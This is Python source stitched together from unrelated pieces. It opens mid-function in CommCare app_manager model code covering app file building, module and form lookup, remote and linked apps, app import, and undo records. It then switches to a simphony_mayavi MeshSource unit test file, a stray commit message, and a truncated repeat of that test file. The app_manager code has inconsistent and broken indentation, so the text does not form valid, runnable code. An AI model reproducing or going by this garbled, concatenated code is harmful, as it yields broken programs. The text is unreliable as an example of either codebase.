        for lang in ['default'] + self.get_build_langs(build_profile_id)
    }

@time_method()
def _get_form_files(self, prefix, build_profile_id):
    """Rendered XForm files keyed by build path, skipping shadow/disabled forms."""
    files = {}
    for form_stuff in self.get_forms(bare=False):
        def exclude_form(form):
            return isinstance(form, ShadowForm) or form.is_a_disabled_release_form()

        if not exclude_form(form_stuff['form']):
            filename = prefix + self.get_form_filename(**form_stuff)
            form = form_stuff['form']
            try:
                files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
            except XFormValidationFailed:
                raise XFormException(_('Unable to validate the forms due to a server error. '
                                       'Please try again later.'))
            except XFormException as e:
                # Re-raise with the form's name for a user-meaningful message.
                raise XFormException(_('Error in form "{}": {}').format(trans(form.name), six.text_type(e)))
    return files
@time_method()
@memoized
def create_all_files(self, build_profile_id=None):
    """
    Build every artifact of the app (profiles, suites, app strings, forms,
    optional practice-user restore) as a dict of path -> contents.
    Also stamps form and media versions as a side effect.
    """
    self.set_form_versions()
    self.set_media_versions()
    prefix = '' if not build_profile_id else build_profile_id + '/'
    files = {
        '{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
        '{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
        '{}media_profile.xml'.format(prefix):
            self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
        '{}media_profile.ccpr'.format(prefix):
            self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
        '{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
        '{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
    }

    # Extra flavor-specific profiles (e.g. CommCare LTS) when a target flavor is set.
    if self.target_commcare_flavor != 'none':
        files['{}profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
            is_odk=False,
            build_profile_id=build_profile_id,
            target_commcare_flavor=self.target_commcare_flavor,
        )
        files['{}profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
            is_odk=True,
            build_profile_id=build_profile_id,
            target_commcare_flavor=self.target_commcare_flavor,
        )
        files['{}media_profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
            is_odk=False,
            with_media=True,
            build_profile_id=build_profile_id,
            target_commcare_flavor=self.target_commcare_flavor,
        )
        files['{}media_profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
            is_odk=True,
            with_media=True,
            build_profile_id=build_profile_id,
            target_commcare_flavor=self.target_commcare_flavor,
        )

    practice_user_restore = self.create_practice_user_restore(build_profile_id)
    if practice_user_restore:
        files.update({
            '{}practice_user_restore.xml'.format(prefix): practice_user_restore
        })

    files.update(self._make_language_files(prefix, build_profile_id))
    files.update(self._get_form_files(prefix, build_profile_id))
    return files
# Iterator over modules, each wrapped with its index (see IndexedSchema.Getter)
get_modules = IndexedSchema.Getter('modules')

@parse_int([1])
def get_module(self, i):
    """Return module *i* (negative indices supported via the modulo below)."""
    try:
        return self.modules[i].with_id(i % len(self.modules), self)
    except IndexError:
        raise ModuleNotFoundException(_("Could not find module with index {}".format(i)))
def get_module_by_unique_id(self, unique_id, error=''):
    """
    Return the module whose (possibly newly created) unique id matches
    *unique_id*; raise ModuleNotFoundException with *error* (or a default
    message) when no module matches.
    """
    for module in self.get_modules():
        if module.get_or_create_unique_id() == unique_id:
            return module
    if not error:
        error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
            app_name=self.name, unique_id=unique_id)
    raise ModuleNotFoundException(error)
def get_module_index(self, unique_id):
    """Return the index of the module with *unique_id*, or raise ModuleNotFoundException."""
    for position, module in enumerate(self.get_modules()):
        if module.unique_id == unique_id:
            return position
    raise ModuleNotFoundException(
        _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
            app_name=self.name, unique_id=unique_id))
def get_report_modules(self):
    """Yield every ReportModule in the app."""
    for module in self.modules:
        if isinstance(module, ReportModule):
            yield module

def get_forms(self, bare=True):
    """Yield every form; with bare=False each item is a dict carrying module context."""
    for module in self.get_modules():
        for form in module.get_forms():
            yield form if bare else {
                'type': 'module_form',
                'module': module,
                'form': form
            }
def get_form(self, form_unique_id, bare=True):
    """Return the form (or context dict, when bare=False) with the given unique id."""
    def matches(form):
        return form.get_unique_id() == form_unique_id
    for obj in self.get_forms(bare):
        if matches(obj if bare else obj['form']):
            return obj
    raise FormNotFoundException(
        ("Form in app '%s' with unique id '%s' not found"
         % (self.id, form_unique_id)))

def get_form_location(self, form_unique_id):
    """Return (module_index, form_index) for the form; raise KeyError when absent."""
    for m_index, module in enumerate(self.get_modules()):
        for f_index, form in enumerate(module.get_forms()):
            if form_unique_id == form.unique_id:
                return m_index, f_index
    raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, form_unique_id))
@classmethod
def new_app(cls, domain, name, lang="en"):
    """Construct a fresh (unsaved) app with one language and no modules."""
    app = cls(domain=domain, modules=[], name=name, langs=[lang], date_created=datetime.datetime.utcnow())
    return app

def add_module(self, module):
    """Append *module* and return it wrapped with its index."""
    self.modules.append(module)
    return self.get_module(-1)
def delete_module(self, module_unique_id):
    """
    Remove the module with the given unique id, returning a saved undo
    record, or None when no such module exists. The app itself is not
    saved here.
    """
    try:
        module = self.get_module_by_unique_id(module_unique_id)
    except ModuleNotFoundException:
        return None
    record = DeleteModuleRecord(
        domain=self.domain,
        app_id=self.id,
        module_id=module.id,
        module=module,
        datetime=datetime.datetime.utcnow()
    )
    del self.modules[module.id]
    record.save()
    return record

def new_form(self, module_id, name, lang, attachment=Ellipsis):
    """Create a new form in module *module_id* (Ellipsis = use default attachment)."""
    module = self.get_module(module_id)
    return module.new_form(name, lang, attachment)
def delete_form(self, module_unique_id, form_unique_id):
    """
    Remove a form from its module, returning a saved undo record, or None
    when the module or form is missing. The app itself is not saved here.
    """
    try:
        module = self.get_module_by_unique_id(module_unique_id)
        form = self.get_form(form_unique_id)
    except (ModuleNotFoundException, FormNotFoundException):
        return None

    record = DeleteFormRecord(
        domain=self.domain,
        app_id=self.id,
        module_unique_id=module_unique_id,
        form_id=form.id,
        form=form,
        datetime=datetime.datetime.utcnow(),
    )
    record.save()

    try:
        form.pre_delete_hook()
    except NotImplementedError:
        pass

    del module['forms'][form.id]
    return record
def rename_lang(self, old_lang, new_lang):
    """
    Rename a language code everywhere it appears: app langs, build
    profiles, every module, and the translations dict. Raises
    AppEditingError when *new_lang* already exists.
    """
    validate_lang(new_lang)
    if old_lang == new_lang:
        return
    if new_lang in self.langs:
        raise AppEditingError("Language %s already exists!" % new_lang)
    for i, lang in enumerate(self.langs):
        if lang == old_lang:
            self.langs[i] = new_lang
    for profile in self.build_profiles:
        for i, lang in enumerate(profile.langs):
            if lang == old_lang:
                profile.langs[i] = new_lang
    for module in self.get_modules():
        module.rename_lang(old_lang, new_lang)
    _rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
    """Move the module at position j to position i; raise RearrangeError on bad indices."""
    modules = self.modules
    try:
        modules.insert(i, modules.pop(j))
    except IndexError:
        raise RearrangeError()
    # reassign so the document property registers the change
    self.modules = modules
def rearrange_forms(self, to_module_id, from_module_id, i, j):
    """
    The case type of the two modules conflict, the rearrangement goes through anyway.
    This is intentional.
    """
    to_module = self.get_module(to_module_id)
    from_module = self.get_module(from_module_id)
    try:
        from_module.forms[j].pre_move_hook(from_module, to_module)
    except NotImplementedError:
        pass
    try:
        form = from_module.forms.pop(j)
        if not isinstance(form, AdvancedForm):
            # Moving between a survey module and a case module flips the
            # form's case requirements accordingly.
            if from_module.is_surveys != to_module.is_surveys:
                if from_module.is_surveys:
                    form.requires = "case"
                    form.actions.update_case = UpdateCaseAction(
                        condition=FormActionCondition(type='always'))
                else:
                    form.requires = "none"
                    form.actions.update_case = UpdateCaseAction(
                        condition=FormActionCondition(type='never'))
        to_module.add_insert_form(from_module, form, index=i, with_source=True)
    except IndexError:
        raise RearrangeError()
def scrub_source(self, source):
    """Re-generate form and report-module ids in an exported app source."""
    source = update_form_unique_ids(source)
    return update_report_module_ids(source)
def copy_form(self, from_module, form, to_module, rename=False):
    """
    The case type of the two modules conflict,
    copying (confusingly) is still allowed.
    This is intentional.
    """
    copy_source = deepcopy(form.to_json())
    # only one form can be a release notes form, so set them to False explicitly when copying
    copy_source['is_release_notes_form'] = False
    copy_source['enable_release_notes'] = False
    # drop the id so the copy gets a fresh one
    if 'unique_id' in copy_source:
        del copy_source['unique_id']

    if rename:
        for lang, name in six.iteritems(copy_source['name']):
            with override(lang):
                copy_source['name'][lang] = _('Copy of {name}').format(name=name)

    copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
    to_app = to_module.get_app()
    save_xform(to_app, copy_form, form.source.encode('utf-8'))

    return copy_form
@cached_property
def has_case_management(self):
    """Whether any form anywhere in the app defines at least one case action."""
    return any(
        form.active_actions()
        for module in self.get_modules()
        for form in module.get_forms()
    )
@memoized
def case_type_exists(self, case_type):
    """Whether *case_type* is used anywhere in the app."""
    return case_type in self.get_case_types()

@memoized
def get_case_types(self):
    """Set of all case types across modules, plus the usercase type when in use."""
    extra_types = set()
    if is_usercase_in_use(self.domain):
        extra_types.add(USERCASE_TYPE)
    return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types

def has_media(self):
    """True when the app references any multimedia."""
    return len(self.multimedia_map) > 0
@memoized
def get_xmlns_map(self):
    """Map of xmlns -> list of forms with that xmlns (multiple when shadow forms exist)."""
    xmlns_map = defaultdict(list)
    for form in self.get_forms():
        xmlns_map[form.xmlns].append(form)
    return xmlns_map
def get_forms_by_xmlns(self, xmlns, log_missing=True):
    """
    Return the forms with the given xmlns.
    This function could return multiple forms if there are shadow forms in the app.
    """
    # device reports are system forms, never part of the app
    if xmlns == "http://code.javarosa.org/devicereport":
        return []
    forms = self.get_xmlns_map()[xmlns]
    if len(forms) < 1:
        if log_missing:
            logging.error('App %s in domain %s has %s forms with xmlns %s' % (
                self.get_id,
                self.domain,
                len(forms),
                xmlns,
            ))
        return []
    # at most one real (non-shadow) form may share an xmlns
    non_shadow_forms = [form for form in forms if form.form_type != 'shadow_form']
    assert len(non_shadow_forms) <= 1
    return forms
def get_xform_by_xmlns(self, xmlns, log_missing=True):
    """Return the wrapped XForm for *xmlns*, or None when no form matches."""
    forms = self.get_forms_by_xmlns(xmlns, log_missing)
    if not forms:
        return None
    else:
        # If there are multiple forms with the same xmlns, then all but one are shadow forms, therefore they
        # all have the same xform.
        return forms[0].wrapped_xform()

def get_questions(self, xmlns, langs=None, include_triggers=False, include_groups=False,
                  include_translations=False):
    """Return the question list of the form with *xmlns* ([] when no form matches)."""
    forms = self.get_forms_by_xmlns(xmlns)
    if not forms:
        return []
    # If there are multiple forms with the same xmlns, then some of them are shadow forms, so all the questions
    # will be the same.
    return forms[0].get_questions(langs or self.langs, include_triggers, include_groups, include_translations)

def validate_app(self):
    """Full application validation (stricter than the base-class validator)."""
    return ApplicationValidator(self).validate_app()
    def get_profile_setting(self, s_type, s_id):
        """Resolve the value of profile setting `s_id` of type `s_type`.

        Resolution order: an explicit value stored on this app's profile;
        the last matching "contingent_default" from the settings yaml
        (note: the loop does not break, so later matches win); the
        "disabled_default" when the build predates the setting's "since"
        version; finally the plain yaml "default".
        """
        setting = self.profile.get(s_type, {}).get(s_id)
        if setting is not None:
            return setting
        yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
        for contingent in yaml_setting.get("contingent_default", []):
            if check_condition(self, contingent["condition"]):
                setting = contingent["value"]
        if setting is not None:
            return setting
        if not self.build_version or self.build_version < LooseVersion(yaml_setting.get("since", "0")):
            setting = yaml_setting.get("disabled_default", None)
            if setting is not None:
                return setting
        return yaml_setting.get("default")
    @quickcache(['self._id', 'self.version'])
    def get_case_metadata(self):
        """Build an AppCaseMetadata describing every case type this app
        touches: parent-type relationships, per-module/per-form case
        updates, and per-property descriptions. Cached per app version."""
        from corehq.apps.reports.formdetails.readable import AppCaseMetadata
        case_relationships = get_parent_type_map(self)
        meta = AppCaseMetadata()
        descriptions_dict = get_case_property_description_dict(self.domain)
        # Seed relationships first so modules/forms update existing types.
        for case_type, relationships in case_relationships.items():
            type_meta = meta.get_type(case_type)
            type_meta.relationships = relationships
        for module in self.get_modules():
            module.update_app_case_meta(meta)
            for form in module.get_forms():
                form.update_app_case_meta(meta)
        # Attach human-readable descriptions last, defaulting to ''.
        for type_ in meta.case_types:
            for prop in type_.properties:
                prop.description = descriptions_dict.get(type_.name, {}).get(prop.name, '')
        return meta
def get_subcase_types(self, case_type):
"""
Return the subcase types defined across an app for the given case type
"""
return {t for m in self.get_modules()
if m.case_type == case_type
for t in m.get_subcase_types()}
    @memoized
    def grid_display_for_some_modules(self):
        """True when grid form menus are enabled for selected modules only."""
        return self.grid_form_menus == 'some'
    @memoized
    def grid_display_for_all_modules(self):
        """True when grid form menus are enabled for all modules."""
        return self.grid_form_menus == 'all'
class RemoteApp(ApplicationBase):
    """
    A wrapper for a url pointing to a suite or profile file. This allows you to
    write all the files for an app by hand, and then give the url to app_manager
    and let it package everything together for you.
    """
    profile_url = StringProperty(default="http://")
    name = StringProperty()
    manage_urls = BooleanProperty(default=False)

    # Cache of xmlns -> question list, built lazily by get_questions().
    questions_map = DictProperty(required=False)

    def is_remote_app(self):
        return True

    @classmethod
    def new_app(cls, domain, name, lang='en'):
        """Alternate constructor: a fresh remote app with one language."""
        app = cls(domain=domain, name=name, langs=[lang])
        return app

    def create_profile(self, is_odk=False, langs=None):
        """Render the remote profile file. `is_odk` is accepted but ignored."""
        # we don't do odk for now anyway
        return remote_app.make_remote_profile(self, langs)

    def strip_location(self, location):
        """Strip the profile base url from `location`, leaving a relative path."""
        return remote_app.strip_location(self.profile_url, location)

    def fetch_file(self, location):
        """Download one resource relative to the profile url.

        Returns (relative_location, content); wraps any download failure
        in AppEditingError.
        """
        location = self.strip_location(location)
        url = urljoin(self.profile_url, location)
        try:
            content = urlopen(url).read()
        except Exception:
            raise AppEditingError('Unable to access resource url: "%s"' % url)
        return location, content

    def get_build_langs(self):
        """Return the languages to build with; remote apps support at most
        one build profile."""
        if self.build_profiles:
            if len(list(self.build_profiles.keys())) > 1:
                raise AppEditingError('More than one app profile for a remote app')
            else:
                # return first profile, generated as part of lazy migration
                return self.build_profiles[list(self.build_profiles.keys())[0]].langs
        else:
            return self.langs

    @classmethod
    def get_locations(cls, suite):
        """Yield (resource_tag, location) pairs from a parsed suite,
        preferring the local-authority location over the remote one."""
        for resource in suite.findall('*/resource'):
            try:
                loc = resource.findtext('location[@authority="local"]')
            except Exception:
                loc = resource.findtext('location[@authority="remote"]')
            yield resource.getparent().tag, loc

    @property
    def SUITE_XPATH(self):
        # XPath locating the suite file's local location inside profile.xml.
        return 'suite/resource/location[@authority="local"]'

    def create_all_files(self, build_profile_id=None):
        """Fetch and assemble every file of the remote app (profile, suite,
        xforms, logo) into a {path: content} dict for packaging."""
        langs_for_build = self.get_build_langs()
        files = {
            'profile.xml': self.create_profile(langs=langs_for_build),
        }
        tree = _parse_xml(files['profile.xml'])

        def add_file_from_path(path, strict=False, transform=None):
            # Fetch every location matched by `path` in the profile; with
            # strict=True a missing reference is an error, otherwise the
            # entry is silently skipped.
            added_files = []
            # must find at least one
            try:
                tree.find(path).text
            except (TypeError, AttributeError):
                if strict:
                    raise AppEditingError("problem with file path reference!")
                else:
                    return
            for loc_node in tree.findall(path):
                loc, file = self.fetch_file(loc_node.text)
                if transform:
                    file = transform(file)
                files[loc] = file
                added_files.append(file)
            return added_files

        add_file_from_path('features/users/logo')
        try:
            suites = add_file_from_path(
                self.SUITE_XPATH,
                strict=True,
                transform=(lambda suite:
                           remote_app.make_remote_suite(self, suite))
            )
        except AppEditingError:
            raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))

        for suite in suites:
            suite_xml = _parse_xml(suite)
            for tag, location in self.get_locations(suite_xml):
                location, data = self.fetch_file(location)
                if tag == 'xform' and langs_for_build:
                    try:
                        xform = XForm(data)
                    except XFormException as e:
                        raise XFormException('In file %s: %s' % (location, e))
                    # Keep only the build languages in each xform.
                    xform.exclude_languages(whitelist=langs_for_build)
                    data = xform.render()
                files.update({location: data})
        return files

    def make_questions_map(self):
        """Build {xmlns: question list} from this (saved) app copy's
        attached files, or None when this is not a saved copy."""
        langs_for_build = self.get_build_langs()
        if self.copy_of:
            xmlns_map = {}

            def fetch(location):
                filepath = self.strip_location(location)
                return self.fetch_attachment('files/%s' % filepath, return_bytes=True)

            profile_xml = _parse_xml(fetch('profile.xml'))
            suite_location = profile_xml.find(self.SUITE_XPATH).text
            suite_xml = _parse_xml(fetch(suite_location))

            for tag, location in self.get_locations(suite_xml):
                if tag == 'xform':
                    xform = XForm(fetch(location).decode('utf-8'))
                    xmlns = xform.data_node.tag_xmlns
                    questions = xform.get_questions(langs_for_build)
                    xmlns_map[xmlns] = questions
            return xmlns_map
        else:
            return None

    def get_questions(self, xmlns):
        """Return the cached question list for `xmlns`, building and
        persisting the questions map on first use."""
        if not self.questions_map:
            self.questions_map = self.make_questions_map()
            if not self.questions_map:
                return []
            self.save()
        questions = self.questions_map.get(xmlns, [])
        return questions
class LinkedApplication(Application):
    """
    An app that can pull changes from an app in a different domain.
    """
    # This is the id of the master application
    master = StringProperty()

    # The following properties will overwrite their corresponding values from
    # the master app everytime the new master is pulled
    linked_app_translations = DictProperty()  # corresponding property: translations
    linked_app_logo_refs = DictProperty()  # corresponding property: logo_refs

    # if `uses_master_app_form_ids` is True, the form id might match the master's form id
    # from a bug years ago. These should be fixed when mobile can handle the change
    # https://manage.dimagi.com/default.asp?283410
    uses_master_app_form_ids = BooleanProperty(default=False)

    @property
    @memoized
    def domain_link(self):
        # Imported here, presumably to avoid a circular import — confirm.
        from corehq.apps.linked_domain.dbaccessors import get_domain_master_link
        return get_domain_master_link(self.domain)

    def get_master_version(self):
        """Version of the master app; None when the domain is not linked."""
        if self.domain_link:
            return get_master_app_version(self.domain_link, self.master)

    @property
    def master_is_remote(self):
        # None (falsy) when the domain is not linked at all.
        if self.domain_link:
            return self.domain_link.is_remote

    def get_latest_master_release(self):
        """Latest released build of the master app; raises
        ActionNotPermitted when the domain is not linked."""
        if self.domain_link:
            return get_latest_master_app_release(self.domain_link, self.master)
        else:
            raise ActionNotPermitted

    def reapply_overrides(self):
        """Re-apply this linked app's local overrides (translations and
        logos) on top of whatever was pulled from the master, then save."""
        self.translations.update(self.linked_app_translations)
        self.logo_refs.update(self.linked_app_logo_refs)
        for key, ref in self.logo_refs.items():
            mm = CommCareMultimedia.get(ref['m_id'])
            self.create_mapping(mm, ref['path'], save=False)
        self.save()
def import_app(app_id_or_source, domain, source_properties=None):
    """Copy an app into `domain` and return the new app object.

    `app_id_or_source` is either an app id (the app is fetched and
    exported) or an already-exported app source dict. Entries of
    `source_properties` are written over the exported source before it is
    re-wrapped.
    """
    if isinstance(app_id_or_source, six.string_types):
        soft_assert_type_text(app_id_or_source)
        app_id = app_id_or_source
        source = get_app(None, app_id)
        source_domain = source['domain']
        source = source.export_json(dump_json=False)
        report_map = get_static_report_mapping(source_domain, domain)
    else:
        cls = get_correct_app_class(app_id_or_source)
        # Don't modify original app source
        app = cls.wrap(deepcopy(app_id_or_source))
        source = app.export_json(dump_json=False)
        report_map = {}
    try:
        attachments = source['_attachments']
    except KeyError:
        attachments = {}
    finally:
        # Strip attachments from the doc body; they are re-attached via
        # save_attachments() below.
        source['_attachments'] = {}
    if source_properties is not None:
        for key, value in six.iteritems(source_properties):
            source[key] = value
    cls = get_correct_app_class(source)
    # Allow the wrapper to update to the current default build_spec
    if 'build_spec' in source:
        del source['build_spec']
    app = cls.from_source(source, domain)
    app.date_created = datetime.datetime.utcnow()
    app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)

    if report_map:
        # Remap static report ids from the source domain to this domain.
        for module in app.get_report_modules():
            for config in module.report_configs:
                try:
                    config.report_id = report_map[config.report_id]
                except KeyError:
                    raise AppEditingError(
                        "Report {} not found in {}".format(config.report_id, domain)
                    )

    app.save_attachments(attachments)

    if not app.is_remote_app():
        # Make the destination domain valid for all copied multimedia.
        for _, m in app.get_media_objects():
            if domain not in m.valid_domains:
                m.valid_domains.append(domain)
                m.save()

    if not app.is_remote_app():
        enable_usercase_if_necessary(app)

    return app
def enable_usercase_if_necessary(app):
    """Turn on the usercase for the app's domain if any module uses it."""
    if any(module.uses_usercase() for module in app.get_modules()):
        # Imported here, presumably to avoid a circular import — confirm.
        from corehq.apps.app_manager.util import enable_usercase
        enable_usercase(app.domain)
class DeleteApplicationRecord(DeleteRecord):
    """Undo-record for a deleted application."""

    app_id = StringProperty()

    def undo(self):
        """Restore the app by resetting its doc_type (presumably deletion
        works by retyping the doc — confirm), without bumping its version."""
        app = ApplicationBase.get(self.app_id)
        app.doc_type = app.get_doc_type()
        app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
    """Undo-record for a deleted module: reinserts it at its old index."""

    app_id = StringProperty()
    module_id = IntegerProperty()
    module = SchemaProperty(ModuleBase)

    def undo(self):
        app = Application.get(self.app_id)
        modules = app.modules
        modules.insert(self.module_id, self.module)
        app.modules = modules
        app.save()
class DeleteFormRecord(DeleteRecord):
    """Undo-record for a deleted form: reinserts it into its module."""

    app_id = StringProperty()
    module_id = IntegerProperty()
    module_unique_id = StringProperty()
    form_id = IntegerProperty()
    form = SchemaProperty(FormBase)

    def undo(self):
        app = Application.get(self.app_id)
        if self.module_unique_id is not None:
            # Records carrying a unique id locate the module by id...
            name = trans(self.form.name, app.default_language, include_lang=False)
            module = app.get_module_by_unique_id(
                self.module_unique_id,
                error=_("Could not find form '{}'").format(name)
            )
        else:
            # ...otherwise fall back to the positional index.
            module = app.modules[self.module_id]
        forms = module.forms
        forms.insert(self.form_id, self.form)
        module.forms = forms
        app.save()
class GlobalAppConfig(Document):
    """Per-(app, domain) settings controlling mobile update prompts."""

    # this should be the unique id of the app (not of a versioned copy)
    app_id = StringProperty()
    domain = StringProperty()

    # these let mobile prompt updates for application and APK
    app_prompt = StringProperty(
        choices=["off", "on", "forced"],
        default="off"
    )
    apk_prompt = StringProperty(
        choices=["off", "on", "forced"],
        default="off"
    )

    # corresponding versions to which user should be prompted to update to
    apk_version = StringProperty(default=LATEST_APK_VALUE)  # e.g. '2.38.0/latest'
    app_version = IntegerProperty(default=LATEST_APP_VALUE)

    @classmethod
    def for_app(cls, app):
        """
        Returns the actual config object for the app or an unsaved
        default object
        """
        app_id = app.master_id

        res = cls.get_db().view(
            "global_app_config_by_app_id/view",
            key=[app_id, app.domain],
            reduce=False,
            include_docs=True,
        ).one()

        if res:
            return cls(res['doc'])
        else:
            # return default config
            return cls(app_id=app_id, domain=app.domain)

    def save(self, *args, **kwargs):
        # Saving new prompt settings invalidates the cached latest-app info
        # served to mobile devices.
        LatestAppInfo(self.app_id, self.domain).clear_caches()
        super(GlobalAppConfig, self).save(*args, **kwargs)
class LatestEnabledBuildProfiles(models.Model):
    """SQL record tracking the latest enabled build for a build profile."""

    app_id = models.CharField(max_length=255)
    build_profile_id = models.CharField(max_length=255)
    version = models.IntegerField()
    build_id = models.CharField(max_length=255)

    def expire_cache(self, domain):
        """Invalidate the cached latest-enabled-build lookups for this profile."""
        get_latest_enabled_build_for_profile.clear(domain, self.build_profile_id)
        get_latest_enabled_versions_per_profile.clear(self.app_id)
# backwards compatibility with suite-1.0.xml
# Monkey-patched accessors that delegate id/locale string generation to
# the id_strings module.
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)

ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)

ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)

Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
|
import unittest
import numpy
from numpy.testing import assert_array_equal
from simphony.cuds.mesh import Mesh, Point, Cell, Edge, Face
from simphony_mayavi.sources.api import MeshSource, cell_array_slicer
from simphony_mayavi.sources.mesh_source import (
CELL2VTKCELL, FACE2VTKCELL, EDGE2VTKCELL)
class TestParticlesSource(unittest.TestCase):
    """Tests for converting a simphony Mesh container into a VTK MeshSource.

    Fix: the dict iteration uses ``items()`` instead of the Python-2-only
    ``iteritems()`` so the tests also run under Python 3 (``items()`` is
    valid on both).
    """

    def setUp(self):
        # 12 points: indices 0-3 form a tetrahedron, 4-11 a hexahedron.
        self.points = points = numpy.array([
            [0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
            [2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
            [2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
            'f')
        self.cells = [
            [0, 1, 2, 3],  # tetra
            [4, 5, 6, 7, 8, 9, 10, 11]]  # hex
        self.faces = [[2, 7, 11]]
        self.edges = [[1, 4], [3, 8]]
        self.container = container = Mesh('test')
        self.point_uids = [
            container.add_point(Point(coordinates=point)) for point in points]

    def test_points(self):
        """Every container point appears at its mapped index in the source."""
        container = self.container

        source = MeshSource.from_mesh(container)

        points = source.data.points.to_array()
        number_of_points = len(self.points)
        self.assertEqual(len(points), number_of_points)
        self.assertEqual(len(source.point2index), number_of_points)
        for key, index in source.point2index.items():
            point = container.get_point(key)
            assert_array_equal(points[index], point.coordinates)

    def test_cells(self):
        """Cells map to the right VTK cell type and point indices."""
        container = self.container
        for cell in self.cells:
            container.add_cell(
                Cell(points=[self.point_uids[index] for index in cell]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        cells = [
            cell
            for cell in cell_array_slicer(vtk_source.get_cells().to_array())]
        number_of_cells = len(self.cells)
        self.assertEqual(len(cells), number_of_cells)
        self.assertEqual(len(source.element2index), number_of_cells)
        for key, index in source.element2index.items():
            cell = container.get_cell(key)
            self.assertEqual(
                vtk_source.get_cell_type(index),
                CELL2VTKCELL[len(cell.points)])
            points = [source.point2index[uid] for uid in cell.points]
            self.assertEqual(cells[index], points)

    def test_edges(self):
        """Edges map to the right VTK cell type and point indices."""
        container = self.container
        for edge in self.edges:
            container.add_edge(
                Edge(points=[self.point_uids[index] for index in edge]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        edges = [
            edge
            for edge in cell_array_slicer(vtk_source.get_cells().to_array())]
        number_of_edges = len(self.edges)
        self.assertEqual(len(edges), number_of_edges)
        self.assertEqual(len(source.element2index), number_of_edges)
        for key, index in source.element2index.items():
            edge = container.get_edge(key)
            self.assertEqual(
                vtk_source.get_cell_type(index),
                EDGE2VTKCELL[len(edge.points)])
            points = [source.point2index[uid] for uid in edge.points]
            self.assertEqual(edges[index], points)

    def test_face(self):
        """Faces map to the right VTK cell type and point indices."""
        container = self.container
        for face in self.faces:
            container.add_face(
                Face(points=[self.point_uids[index] for index in face]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        faces = [
            face
            for face in cell_array_slicer(vtk_source.get_cells().to_array())]
        number_of_faces = len(self.faces)
        self.assertEqual(len(faces), number_of_faces)
        self.assertEqual(len(source.element2index), number_of_faces)
        for key, index in source.element2index.items():
            face = container.get_face(key)
            self.assertEqual(
                vtk_source.get_cell_type(index),
                FACE2VTKCELL[len(face.points)])
            points = [source.point2index[uid] for uid in face.points]
            self.assertEqual(faces[index], points)

    def test_all_element_types(self):
        """Mixed containers classify each element by its VTK cell type."""
        container = self.container
        for face in self.faces:
            container.add_face(
                Face(points=[self.point_uids[index] for index in face]))
        for edge in self.edges:
            container.add_edge(
                Edge(points=[self.point_uids[index] for index in edge]))
        for cell in self.cells:
            container.add_cell(
                Cell(points=[self.point_uids[index] for index in cell]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        elements = [
            element
            for element in cell_array_slicer(
                vtk_source.get_cells().to_array())]
        number_of_elements = \
            len(self.faces) + len(self.edges) + len(self.cells)
        self.assertEqual(len(elements), number_of_elements)
        self.assertEqual(len(source.element2index), number_of_elements)
        for key, index in source.element2index.items():
            cell_type = vtk_source.get_cell_type(index)
            if cell_type in EDGE2VTKCELL.values():
                element = container.get_edge(key)
                self.assertEqual(
                    cell_type, EDGE2VTKCELL[len(element.points)])
            elif cell_type in FACE2VTKCELL.values():
                element = container.get_face(key)
                self.assertEqual(
                    cell_type, FACE2VTKCELL[len(element.points)])
            elif cell_type in CELL2VTKCELL.values():
                element = container.get_cell(key)
                self.assertEqual(
                    cell_type, CELL2VTKCELL[len(element.points)])
            else:
                self.fail('vtk source has an unknown cell type')
            points = [source.point2index[uid] for uid in element.points]
            self.assertEqual(elements[index], points)
Update test_mesh_source.py
import unittest
import numpy
from numpy.testing import assert_array_equal
from simphony.cuds.mesh import Mesh, Point, Cell, Edge, Face
from simphony_mayavi.sources.api import MeshSource, cell_array_slicer
from simphony_mayavi.sources.mesh_source import (
CELL2VTKCELL, FACE2VTKCELL, EDGE2VTKCELL)
class TestParticlesSource(unittest.TestCase):
    """Tests for converting a simphony Mesh container into a VTK MeshSource.

    Fix: the dict iteration uses ``items()`` instead of the Python-2-only
    ``iteritems()`` so the tests also run under Python 3 (``items()`` is
    valid on both).
    """

    def setUp(self):
        # 12 points: indices 0-3 form a tetrahedron, 4-11 a hexahedron.
        self.points = points = numpy.array([
            [0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
            [2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
            [2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
            'f')
        self.cells = [
            [0, 1, 2, 3],  # tetra
